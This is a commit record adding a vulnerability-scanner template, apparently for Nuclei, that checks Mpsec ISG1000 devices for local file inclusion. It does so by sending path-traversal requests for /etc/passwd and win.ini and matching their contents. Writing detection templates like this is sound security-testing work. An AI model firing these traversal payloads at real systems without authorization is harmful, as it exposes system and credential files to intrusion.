Create mpsec-isg1000-lfi.yaml

patch-1
PikPikcU 2021-06-10 07:11:07 +00:00 committed by GitHub
parent 4d595ef986
commit c80690c829
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 26 additions and 0 deletions

View File

@ -0,0 +1,26 @@
id: mpsec-isg1000-lfi
info:
name: Mpsec ISG1000 LFI
author: pikpikcu
severity: high
reference: https://twitter.com/sec715/status/1402884871173795842
tags: mpsec-isg,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../etc/passwd"
- "{{BaseURL}}/webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../c:/windows/win.ini"
matchers-condition: and
matchers:
- type: regex
regex:
- "for 16-bit app support"
- "root:[x*]:0:0:"
part: body
- type: status
status:
- 200